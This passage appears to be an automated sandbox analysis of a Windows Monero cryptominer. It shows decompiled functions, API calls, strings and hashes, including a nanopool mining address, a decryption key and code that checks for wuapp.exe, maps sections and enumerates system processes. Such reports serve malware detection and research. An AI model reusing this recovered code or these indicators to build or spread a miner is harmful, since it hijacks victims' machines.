								_t45 = Process32Next(_v8,  &_v308); // executed
							} while (_t45 != 0);
						}
						L20:
						CloseHandle(_v8);
						_t39 = _v12;
						if(_t39 != 0) {
							FreeLibrary(_t39);
						}
						return _t69;
					} else {
						return 0;
					}
				}
			}

0x004080ed
0x00408261
0x004080f3
0x004080f5
0x004080f7
0x00408104
0x00408107
0x0040810c
0x0040810e
0x00408114
0x00408124
0x00408126
0x0040812c
0x00408131
0x0040813f
0x0040813f
0x00408149
0x0040814e
0x00408153
0x00408158
0x0040819f
0x004081a5
0x004081aa
0x0040815e
0x00408168
0x0040816d
0x0040817b
0x00408180
0x00408185
0x00408193
0x00408198
0x0040819d
0x00000000
0x00000000
0x0040819d
0x00408185
0x0040816d
0x004081b6
0x004081bd
0x004081c0
0x004081c7
0x0040820f
0x00408215
0x00408218
0x0040821c
0x00000000
0x00000000
0x004081cd
0x004081d7
0x004081dd
0x00000000
0x004081df
0x004081eb
0x004081f0
0x004081f5
0x00000000
0x004081f7
0x00408203
0x00408208
0x0040820d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040820d
0x004081f5
0x004081dd
0x00000000
0x0040821e
0x00408228
0x0040822d
0x004081c0
0x00408231
0x00408234
0x0040823a
0x00408240
0x00408243
0x00408243
0x00408250
0x00408116
0x0040811d
0x0040811d
0x00408114

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00408107
LoadLibraryA.KERNEL32(kernel32.dll,004067D1,00000002,00000000,73BCF7F0,00000000), ref: 00408126
GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 00408139
Process32First.KERNEL32 ref: 00408149
Process32Next.KERNEL32 ref: 004081B6
ProcessIdToSessionId.KERNELBASE(?,00000000,00001000,00000128,00000000,00000128), ref: 004081D7
Process32Next.KERNEL32 ref: 00408228
CloseHandle.KERNEL32(00001000,00001000,00000128,00000000,00000128), ref: 00408234
FreeLibrary.KERNEL32(00000000), ref: 00408243

Strings

explorer.exe, xrefs: 00408251
winlogon.exe, xrefs: 0040818E
winlogon.exe, xrefs: 004081FE
csrss.exe, xrefs: 00408176
csrss.exe, xrefs: 004081E6
kernel32.dll, xrefs: 0040811F
ProcessIdToSessionId, xrefs: 00408133

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process32$LibraryNext$AddressCloseCreateFirstFreeHandleLoadProcProcessSessionSnapshotToolhelp32
String ID: ProcessIdToSessionId$csrss.exe$csrss.exe$explorer.exe$kernel32.dll$winlogon.exe$winlogon.exe
API String ID: 1815987945-4289567422
Opcode ID: 98e22b258cce26b2785233436b6d0c16d26097fc0348f6c4cb321f3f24bafe53
Instruction ID: e2503db8604718d0b55e8117c492ad94a53ae061e857ffc76dcc057c8b58004a
Opcode Fuzzy Hash: 98e22b258cce26b2785233436b6d0c16d26097fc0348f6c4cb321f3f24bafe53
Instruction Fuzzy Hash: FC41A8759002186BDF10AF60DE41BEA77A8AF54345F0001BEFD44F62C1EF398E51CA99

Uniqueness

Uniqueness Score: -1.00%

Function 004037E0, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 127
nativefilememoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E004037E0(void* __eflags, char _a4) {
				void* _v8;
				long _v12;
				long _v16;
				long _v20;
				void* _v24;
				char _v32;
				long _v36;
				void* _v40;
				long _v44;
				long _v48;
				long _v52;
				long _v56;
				intOrPtr _v60;
				char* _v64;
				long _v68;
				void* _v72;
				void* _t35;
				long* _t45;
				void* _t50;
				intOrPtr _t59;
				void* _t60;

				_t1 =  &_a4; // 0x40476c
				_t59 =  *_t1;
				_t35 = E00407ED0(_t59); // executed
				if(_t35 == 0) {
					L11:
					return 0;
				} else {
					_push(0);
					_push(0);
					_v8 = 0;
					asm("xorps xmm0, xmm0");
					_v72 = 0;
					_push( &_v32);
					_push(_t59);
					asm("movups [ebp-0x40], xmm0");
					_v52 = 0;
					_v24 = 0;
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v40 = 0;
					_v36 = 0;
					_v48 = 0;
					_v44 = 0;
					asm("movq [ebp-0x1c], xmm0");
					if( *0x5d10b8() != 1) {
						goto L11;
					} else {
						_v72 = 0x18;
						_v64 =  &_v32;
						_v68 = 0;
						_v60 = 0x40;
						_v56 = 0;
						_v52 = 0;
						if(NtCreateFile( &_v8, 0x120089,  &_v72,  &_v24,  &_v40, 0x80, 3, 1, 0x60, 0, 0) != 0) {
							goto L11;
						} else {
							_t45 =  &_v16;
							__imp__GetFileSizeEx(_v8, _t45);
							if(_t45 == 0 || _v16 != 0xcc8 || _v12 != 0) {
								L10:
								NtClose(_v8);
								goto L11;
							} else {
								_t60 = VirtualAlloc(0, 0xcc8, 0x3000, 4);
								if(_t60 == 0) {
									goto L10;
								} else {
									_t50 =  *0x5d10bc(_v8, 0, 0, 0,  &_v24, _t60, _v16,  &_v48, 0);
									_push(_v8);
									if(_t50 == 0) {
										NtClose();
										E00401640("xmr-us-east1.nanopool.org:14444", _t60, 0xcc8);
										E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
										VirtualFree(_t60, 0, 0x8000);
										return 1;
									} else {
										NtClose();
										VirtualFree(_t60, 0, 0x8000);
										return 0;
									}
								}
							}
						}
					}
				}
			}

0x004037e7
0x004037e7
0x004037eb
0x004037f5
0x0040399f
0x004039a5
0x004037fb
0x004037fb
0x004037fd
0x00403802
0x00403809
0x0040380c
0x00403813
0x00403814
0x00403815
0x00403819
0x00403820
0x00403827
0x0040382e
0x00403835
0x0040383c
0x00403843
0x0040384a
0x00403851
0x00403858
0x00403865
0x00000000
0x0040386b
0x0040387d
0x00403884
0x0040388e
0x00403899
0x004038a9
0x004038b1
0x004038c0
0x00000000
0x004038c6
0x004038c6
0x004038cd
0x004038d5
0x00403996
0x00403999
0x00000000
0x004038f2
0x00403906
0x0040390a
0x00000000
0x00403910
0x00403927
0x0040392d
0x00403932
0x0040394f
0x00403960
0x00403976
0x00403986
0x00403995
0x00403934
0x00403934
0x00403942
0x0040394e
0x0040394e
0x00403932
0x0040390a
0x004038d5
0x004038c0
0x00403865

APIs

Part of subcall function 00407ED0: GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6

RtlDosPathNameToNtPathName_U.NTDLL(lG@,?,00000000,00000000), ref: 0040385D
NtCreateFile.NTDLL(00000000,00120089,00000018,00000000,00000000,00000080,00000003,00000001,00000060,00000000,00000000), ref: 004038B8
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 004038CD
VirtualAlloc.KERNEL32(00000000,00000CC8,00003000,00000004), ref: 00403900
NtReadFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000CC8,00000000,00000000), ref: 00403927
NtClose.NTDLL(00000000), ref: 00403934
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403942
NtClose.NTDLL(00000000), ref: 0040394F
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403986
NtClose.NTDLL(00000000), ref: 00403999

Strings

lG@, xrefs: 004037E7, 004037EA, 00403814
@, xrefs: 00403899
xmr-us-east1.nanopool.org:14444, xrefs: 0040395B, 0040396A
0125789244697858, xrefs: 00403971

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseVirtual$FreePath$AllocAttributesCreateNameName_ReadSize
String ID: 0125789244697858$@$lG@$xmr-us-east1.nanopool.org:14444
API String ID: 27938546-2795650337
Opcode ID: 1db646025260cd4b6ae9ac45ca5030c30e6a6c58ae7cead9cd14b8e1dcc3d868
Instruction ID: 5038ae2be3a5952dc9e1581431ce3c004cda8172756abbfe488321c7fd1decdf
Opcode Fuzzy Hash: 1db646025260cd4b6ae9ac45ca5030c30e6a6c58ae7cead9cd14b8e1dcc3d868
Instruction Fuzzy Hash: AF413DB0E41218BBEB209F94DD0AFDEBBB8AB04715F104167F504B52C0D7B95A488BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004085B0, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 105
nativeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E004085B0(void* __ecx, void* __eflags, long _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				void* _v8;
				void* _v16;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v240;
				void _v248;
				char _v1272;
				short _v3320;
				long _t35;
				long _t53;
				long _t58;

				_v8 = 0;
				E00401BB0( &_v3320, 0, 0x800);
				_t35 = _a4;
				if(_t35 != 0x80000002) {
					if(_t35 != 0x80000001) {
						goto L8;
					} else {
						E00401BB0( &_v1272, 0, 0x400);
						if(E004082B0( &_v1272) == 0) {
							goto L8;
						} else {
							E00401A00( &_v3320, L"\\Registry\\User\\");
							E00401970( &_v3320,  &_v1272);
							goto L5;
						}
					}
				} else {
					E00401A00( &_v3320, L"\\Registry\\Machine");
					L5:
					E00401970( &_v3320, _a8);
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0xc], xmm0");
					RtlInitUnicodeString( &_v16,  &_v3320);
					_v48 = 0x18;
					_v40 =  &_v16;
					_v44 = 0;
					_v36 = 0x40;
					_v32 = 0;
					_v28 = 0;
					_t53 = NtOpenKey( &_v8, 0x20119,  &_v48); // executed
					if(_t53 < 0) {
						L8:
						return 0;
					} else {
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x14], xmm0");
						RtlInitUnicodeString( &_v24, _a12);
						_t58 = NtQueryValueKey(_v8,  &_v24, 1,  &_v248, 0xc8,  &_a4); // executed
						_push(_v8);
						if(_t58 >= 0) {
							NtClose();
							E00401A00(_a16, _v240 +  &_v248);
							return 1;
						} else {
							NtClose();
							goto L8;
						}
					}
				}
			}

0x004085c4
0x004085ce
0x004085d3
0x004085de
0x004085fb
0x00000000
0x00408601
0x0040860f
0x00408625
0x00000000
0x0040862b
0x00408637
0x0040864a
0x00000000
0x0040864f
0x00408625
0x004085e0
0x004085ec
0x00408652
0x0040865c
0x0040866a
0x0040866d
0x00408677
0x00408680
0x00408687
0x00408696
0x0040869e
0x004086a5
0x004086ac
0x004086b3
0x004086bb
0x004086fe
0x00408703
0x004086bd
0x004086c3
0x004086c7
0x004086cc
0x004086eb
0x004086f1
0x004086f6
0x00408704
0x0040871c
0x0040872c
0x004086f8
0x004086f8
0x00000000
0x004086f8
0x004086f6
0x004086bb

APIs

RtlInitUnicodeString.NTDLL(?,?), ref: 00408677
NtOpenKey.NTDLL(00000000,00020119,00000018), ref: 004086B3
RtlInitUnicodeString.NTDLL(73B74D40,00000000), ref: 004086CC
NtQueryValueKey.NTDLL(00000000,73B74D40,00000001,?,000000C8,00404596), ref: 004086EB
NtClose.NTDLL(00000000), ref: 004086F8
NtClose.NTDLL(00000000), ref: 00408704

Strings

\Registry\Machine, xrefs: 004085E6
\Registry\User\, xrefs: 00408631
@, xrefs: 0040869E

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseInitStringUnicode$OpenQueryValue
String ID: @$\Registry\Machine$\Registry\User\
API String ID: 2538698014-2338602205
Opcode ID: 1e4a2f9ca1f13b42ab8a43e3d6aa5f8f717dc5ca93966d64937e1c4d3befbe2b
Instruction ID: d2628628a94712c675b0c195a5174935581fdd4bc81ba0214100a7ffc09d6dc1
Opcode Fuzzy Hash: 1e4a2f9ca1f13b42ab8a43e3d6aa5f8f717dc5ca93966d64937e1c4d3befbe2b
Instruction Fuzzy Hash: 1C412FB1D4020EABDB10DBA0CD45FEE77BCAF14308F1045B6F904F2191EB799A589B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402E40, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 111
nativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00402E40(void* __ecx, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				long _v12;
				intOrPtr _v16;
				short _v18;
				char _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				char* _v36;
				long _v40;
				void* _v44;
				short _t35;
				long _t41;
				void* _t44;
				void* _t48;
				void* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;

				_t54 = __ecx;
				_v12 = 0;
				if(_a8 != 0) {
					 *0x5d1134 = 0;
					goto L4;
				} else {
					_t48 =  *0x5d1134; // 0x3180000
					if(_t48 == 0) {
						L4:
						_t62 =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14)))) + 0x10);
						if(_t62 != 0) {
							_v8 = E00402F80(_t54, _t62, "NtOpenSection");
							_t50 = E00402F80(_t54, _t62, "NtMapViewOfSection");
							_t57 = E00402F80(_t54, _t62, "NtClose");
							if(_v8 == 0 || _t50 == 0) {
								L12:
								return 0;
							} else {
								_t55 = _a4;
								_v16 = _a4;
								_t35 = (E00401B40(_a4) & 0x0000ffff) + (E00401B40(_a4) & 0x0000ffff);
								_v44 = 0x18;
								_v20 = _t35;
								_v18 = _t35;
								_v36 =  &_v20;
								_v40 = 0;
								_v32 = 0x40;
								_v28 = 0;
								_v24 = 0;
								if(NtOpenSection( &_a8, 0xc,  &_v44) >= 0) {
									_t41 = NtMapViewOfSection(_a8, 0xffffffff, 0x5d1134, 0, 0, 0,  &_v12, 1, 0, 2); // executed
									_push(_a8);
									if(_t41 >= 0) {
										if( *0x5d1134 == 0) {
											goto L11;
										} else {
											NtClose();
											_t44 =  *0x5d1134; // 0x3180000
											return _t44;
										}
									} else {
										L11:
										 *_t57();
										goto L12;
									}
								} else {
									E00402DD0(_t55);
									 *0x5d1134 = _t62;
									return _t62;
								}
							}
						} else {
							return 0;
						}
					} else {
						return _t48;
					}
				}
			}

0x00402e40
0x00402e4a
0x00402e51
0x00402e60
0x00000000
0x00402e53
0x00402e53
0x00402e5a
0x00402e6a
0x00402e79
0x00402e7e
0x00402e9a
0x00402ea8
0x00402eb2
0x00402eb8
0x00402f55
0x00402f5d
0x00402ec6
0x00402ec6
0x00402eca
0x00402ed8
0x00402eda
0x00402ee1
0x00402ee5
0x00402eec
0x00402ef8
0x00402f00
0x00402f07
0x00402f0e
0x00402f1a
0x00402f4a
0x00402f4c
0x00402f51
0x00402f65
0x00000000
0x00402f67
0x00402f67
0x00402f69
0x00402f74
0x00402f74
0x00402f53
0x00402f53
0x00402f53
0x00000000
0x00402f53
0x00402f1c
0x00402f1c
0x00402f23
0x00402f2f
0x00402f2f
0x00402f1a
0x00402e80
0x00402e86
0x00402e86
0x00402e5f
0x00402e5f
0x00402e5f
0x00402e5a

APIs

NtOpenSection.NTDLL(00000000,0000000C,00000018,?,?,?,?,73B74D40,00000000,00000000), ref: 00402F15

Strings

NtClose, xrefs: 00402EA2
NtMapViewOfSection, xrefs: 00402E94
@, xrefs: 00402F00
NtOpenSection, xrefs: 00402E89

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: OpenSection
String ID: @$NtClose$NtMapViewOfSection$NtOpenSection
API String ID: 1950954290-3069760132
Opcode ID: 17615c4fecd44b4c39521a1cccd82976107e2cb8dff730541d4d008ca0a3743f
Instruction ID: 4647d7da09d8d8885e3b0c4b8fe7eb1682a85353f2c0fdbf0df9b865095ef5b3
Opcode Fuzzy Hash: 17615c4fecd44b4c39521a1cccd82976107e2cb8dff730541d4d008ca0a3743f
Instruction Fuzzy Hash: 1D319371A01219ABDB10DFA9DD45BDEB7B8EB04714F10416BE908F72C0D7B99A04DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00407AF0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92
nativefileCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00407AF0(WCHAR* _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				void* _v16;
				long _v20;
				char _v24;
				long _v28;
				void* _v32;
				long _v36;
				long _v40;
				long _v44;
				long _v48;
				intOrPtr _v52;
				char* _v56;
				long _v60;
				void* _v64;
				signed char _t35;
				signed int _t36;
				long _t45;
				void* _t48;
				void* _t54;

				_t35 = GetFileAttributesW(_a4); // executed
				if(_t35 == 0xffffffff || (_t35 & 0x00000010) != 0) {
					asm("xorps xmm0, xmm0");
					_v8 = 0;
					_v64 = 0;
					asm("movups [ebp-0x38], xmm0");
					_v44 = 0;
					_v16 = 0;
					_v12 = 0;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_t36 = E00401B40(_a8);
					_v20 = 0;
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0x14], xmm0");
					_t54 = 2 + _t36 * 2;
					_push(0);
					_push(0);
					_push( &_v24);
					_push(_a4);
					if( *0x5d10b8() != 1) {
						L7:
						return 0; // executed
					} else {
						_v64 = 0x18;
						_v56 =  &_v24;
						_v60 = 0;
						_v52 = 0x40;
						_v48 = 0;
						_v44 = 0;
						_t45 = NtCreateFile( &_v8, 0x120116,  &_v64,  &_v16,  &_v32, 0x80, 0, 0, 0x60, 0, 0); // executed
						if(_t45 != 0) {
							goto L7;
						} else {
							_t48 =  *0x5d10c0(_v8, 0, 0, 0,  &_v16, _a8, _t54,  &_v40, _t45); // executed
							_push(_v8);
							if(_t48 == 0) {
								NtClose(); // executed
								return 1;
							} else {
								NtClose();
								goto L7;
							}
						}
					}
				} else {
					return 1;
				}
			}

0x00407af9
0x00407b02
0x00407b15
0x00407b18
0x00407b1f
0x00407b26
0x00407b2a
0x00407b31
0x00407b38
0x00407b3f
0x00407b46
0x00407b4d
0x00407b54
0x00407b5b
0x00407b63
0x00407b6a
0x00407b6d
0x00407b72
0x00407b79
0x00407b7b
0x00407b80
0x00407b81
0x00407b8c
0x00407c12
0x00407c18
0x00407b92
0x00407ba4
0x00407bab
0x00407bb5
0x00407bc0
0x00407bd0
0x00407bd8
0x00407bdf
0x00407be7
0x00000000
0x00407be9
0x00407bff
0x00407c05
0x00407c0a
0x00407c19
0x00407c28
0x00407c0c
0x00407c0c
0x00000000
0x00407c0c
0x00407c0a
0x00407be7
0x00407b08
0x00407b10
0x00407b10

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,0040685B,?,?,?,.exe",?,?,?,[InternetShortcut]URL="file:///), ref: 00407AF9
RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00407B84
NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00407BDF
NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407BFF
NtClose.NTDLL(00000000), ref: 00407C0C
NtClose.NTDLL(00000000), ref: 00407C19

Strings

@, xrefs: 00407BC0

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$ClosePath$AttributesCreateNameName_Write
String ID: @
API String ID: 2032416576-2766056989
Opcode ID: b68e2da1d8a01fec83c1ced52e1a281f962c96c99bbb349389263c075fbb7d0c
Instruction ID: 9f52158c82e738a9b8372dbf463c3a00265b35efd882e416b0d337a0f99a21ed
Opcode Fuzzy Hash: b68e2da1d8a01fec83c1ced52e1a281f962c96c99bbb349389263c075fbb7d0c
Instruction Fuzzy Hash: 0E314270D4020CBBEF10DF90DD49BDEBBB8EB04314F208256F904B62D0D7B66A989B95

Uniqueness

Uniqueness Score: -1.00%

Function 00403BC0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
nativefileCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00403BC0(char _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				long _v20;
				void* _v24;
				long _v28;
				long _v32;
				long _v36;
				long _v40;
				intOrPtr _v44;
				char* _v48;
				long _v52;
				void* _v56;
				long _t29;
				void* _t33;

				asm("xorps xmm0, xmm0");
				_v36 = 0;
				asm("movups [ebp-0x30], xmm0");
				_v8 = 0;
				_v48 =  &_a4;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v20 = 0;
				_v32 = 0;
				_v28 = 0;
				_v56 = 0x18;
				_v52 = 0;
				_v44 = 0x40;
				_v40 = 0;
				_v36 = 0;
				_t29 = NtCreateFile( &_v8, 0x120116,  &_v56,  &_v16,  &_v24, 0x80, 0, 0, 0x60, 0, 0); // executed
				if(_t29 != 0) {
					L3:
					return 0;
				} else {
					_t33 =  *0x5d10c0(_v8, 0, 0, 0,  &_v16, "xmr-us-east1.nanopool.org:14444", 0xcc8,  &_v32, _t29); // executed
					_push(_v8);
					if(_t33 == 0) {
						NtClose();
						return 1;
					} else {
						NtClose();
						goto L3;
					}
				}
			}

0x00403bd0
0x00403bd3
0x00403bda
0x00403be6
0x00403bed
0x00403bf7
0x00403c02
0x00403c12
0x00403c1a
0x00403c21
0x00403c28
0x00403c2f
0x00403c36
0x00403c3d
0x00403c44
0x00403c4b
0x00403c52
0x00403c5a
0x00403c8b
0x00403c90
0x00403c5c
0x00403c78
0x00403c7e
0x00403c83
0x00403c91
0x00403c9f
0x00403c85
0x00403c85
0x00000000
0x00403c85
0x00403c83

APIs

NtCreateFile.NTDLL(00000000,00120116,?,00403B8C,?,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00403C52
NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,xmr-us-east1.nanopool.org:14444,00000CC8,00000000,00000000), ref: 00403C78
NtClose.NTDLL(00000000), ref: 00403C85
NtClose.NTDLL(00000000), ref: 00403C91

Strings

xmr-us-east1.nanopool.org:14444, xrefs: 00403C66
@, xrefs: 00403C3D

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFile$CreateWrite
String ID: @$xmr-us-east1.nanopool.org:14444
API String ID: 3559581051-493715795
Opcode ID: 56d88aa81e982c61328a5cbb6ae928bc3dbf0937083e45afe5ced92eb89ea321
Instruction ID: 92c5b12b779cf31cce4769230797ba73a26a306a4adc66bd02839d29b74e70ae
Opcode Fuzzy Hash: 56d88aa81e982c61328a5cbb6ae928bc3dbf0937083e45afe5ced92eb89ea321
Instruction Fuzzy Hash: A521EDB1E4120DBBEB10DF90DD49BDFBBB8EB04704F204256F904B62C0D7B95A489B99

Uniqueness

Uniqueness Score: -1.00%

Function 00403720, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(005D2DF0,00120089,?,]D@,00000000,00000080,00000001,00000001,00000060,00000000,00000000), ref: 004037A4
NtCreateFile.NTDLL(005D2124,00120089,?,]D@,00000000,00000080,00000001,00000001,00000060,00000000,00000000), ref: 004037C1

Strings

@, xrefs: 00403783
]D@, xrefs: 00403751, 0040375B

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: @$]D@
API String ID: 823142352-925688143
Opcode ID: 03611e97650f41380acb2e73d0c1b10cf4d46751ae042211fc88b9fc410341d6
Instruction ID: 29e337131a3785b045790d3cbff8cd25c944f4b1d8e7a2be103306273d9b840e
Opcode Fuzzy Hash: 03611e97650f41380acb2e73d0c1b10cf4d46751ae042211fc88b9fc410341d6
Instruction Fuzzy Hash: CD118FB0A4130DABEB20DF90CD49BDEBBF8BB18315F10835BE514B62C0D7B556488B98

Uniqueness

Uniqueness Score: -1.00%

Function 00406990, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E00406990(char _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				char* _v44;
				long _v48;
				void* _v52;
				long _t25;

				_t1 =  &_v12; // 0x406875
				_v52 = 0;
				_t3 =  &_a4; // 0x406875
				asm("xorps xmm0, xmm0");
				_v32 = 0;
				asm("movups [ebp-0x2c], xmm0");
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				asm("movq [ebp-0x8], xmm0");
				 *0x5d10b8( *_t3, _t1, 0, 0);
				_v52 = 0x18;
				_v44 =  &_v12;
				_v48 = 0;
				_v40 = 0x40;
				_v36 = 0;
				_v32 = 0;
				_t25 = NtCreateFile(0x5d2dfc, 0x120089,  &_v52,  &_v28,  &_v20, 0x80, 0, 1, 0x60, 0, 0); // executed
				return _t25;
			}

0x0040699a
0x0040699d
0x004069a5
0x004069a8
0x004069ab
0x004069b2
0x004069b6
0x004069bd
0x004069c4
0x004069cb
0x004069d2
0x004069d7
0x004069ef
0x004069f6
0x00406a00
0x00406a0b
0x00406a1d
0x00406a24
0x00406a2b
0x00406a34

APIs

RtlDosPathNameToNtPathName_U.NTDLL(uh@,uh@,00000000,00000000), ref: 004069D7
NtCreateFile.NTDLL(005D2DFC,00120089,00000018,00000000,00000000,00000080,00000000,00000001,00000060,00000000,00000000), ref: 00406A2B

Strings

uh@, xrefs: 0040699A, 004069A4
uh@, xrefs: 004069A5

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Path$CreateFileNameName_
String ID: uh@$uh@
API String ID: 3479931691-972736353
Opcode ID: 45a6eada9ea1dd906960385c986ed5d86993abecfb8ffa17f30c1ee7e5eb38c1
Instruction ID: 0c139073421148209480b6c35fda580d69656a2aecaa2f90744c4bda58df8354
Opcode Fuzzy Hash: 45a6eada9ea1dd906960385c986ed5d86993abecfb8ffa17f30c1ee7e5eb38c1
Instruction Fuzzy Hash: E811DBB4D5031DABEB10DF90CD49BEEBBB8BB04704F10420AE9007A2C0D7B522988F99

Uniqueness

Uniqueness Score: -1.00%

Function 00403B50, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00403B50(void* __edx, char _a4, intOrPtr _a8) {
				void* _t6;
				void* _t7;
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t14;

				_t11 = __edx;
				E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
				_t6 =  *0x5d2df4; // 0x318
				_t13 = _t12 + 0x10;
				if(_t6 != 0 && _t6 != 0xffffffff) {
					NtClose(_t6);
				}
				_push(_a8);
				_t7 = E00403BC0(_a4); // executed
				_t14 = _t13 + 8;
				if(_t7 != 0) {
					_push(_a8);
					E00403680(_t11, _a4); // executed
					_t14 = _t14 + 8;
				}
				return E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
			}

0x00403b50
0x00403b64
0x00403b69
0x00403b6e
0x00403b73
0x00403b7b
0x00403b7b
0x00403b81
0x00403b87
0x00403b8c
0x00403b91
0x00403b93
0x00403b99
0x00403b9e
0x00403b9e
0x00403bbb

APIs

NtClose.NTDLL(00000318), ref: 00403B7B

Strings

0125789244697858, xrefs: 00403B5F
xmr-us-east1.nanopool.org:14444, xrefs: 00403B58, 00403BA6
0125789244697858, xrefs: 00403BAD

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID: 0125789244697858$0125789244697858$xmr-us-east1.nanopool.org:14444
API String ID: 3535843008-899868268
Opcode ID: 05ddcafc9e6955f83f09dbcfd663fe33b0abdaadcb5b8f1db937436fe77c1a83
Instruction ID: b842e7685c2f69810a8eda15092c5b8a142aacb66778a7cb45de6b9a8cdd56ec
Opcode Fuzzy Hash: 05ddcafc9e6955f83f09dbcfd663fe33b0abdaadcb5b8f1db937436fe77c1a83
Instruction Fuzzy Hash: 5EF0B43168120476EF203F999C03E493E585B2475EF004527FE18742E3E5BAD275955E

Uniqueness

Uniqueness Score: -1.00%

Function 00408A50, Relevance: 6.1, APIs: 4, Instructions: 52
nativeCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00408A50(void* _a4) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				long _v28;
				long _v32;
				long _v36;
				void* _v40;
				void* _t21;
				void* _t27;
				int _t28;

				_t21 = _a4;
				if(_t21 != 0) {
					_v16 = _t21;
					_a4 = 0;
					_v40 = 0x18;
					_v36 = 0;
					_v28 = 0;
					_v32 = 0;
					_v24 = 0;
					_v20 = 0;
					_v12 = 0;
					if(NtOpenProcess( &_a4, 0x400,  &_v40,  &_v16) != 0) {
						goto L1;
					} else {
						_t27 = _a4;
						if(_t27 == 0) {
							goto L1;
						} else {
							_v8 = 0;
							_t28 = GetExitCodeProcess(_t27,  &_v8); // executed
							_push(_a4);
							if(_t28 != 0) {
								NtClose(); // executed
								return 0 | _v8 == 0x00000103;
							} else {
								return NtClose() | 0xffffffff; // executed
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x00408a53
0x00408a5b
0x00408a63
0x00408a6d
0x00408a7d
0x00408a85
0x00408a8c
0x00408a93
0x00408a9a
0x00408aa1
0x00408aa8
0x00408ab7
0x00000000
0x00408ab9
0x00408ab9
0x00408abe
0x00000000
0x00408ac0
0x00408ac3
0x00408acc
0x00408ad2
0x00408ad7
0x00408ae6
0x00408afb
0x00408ad9
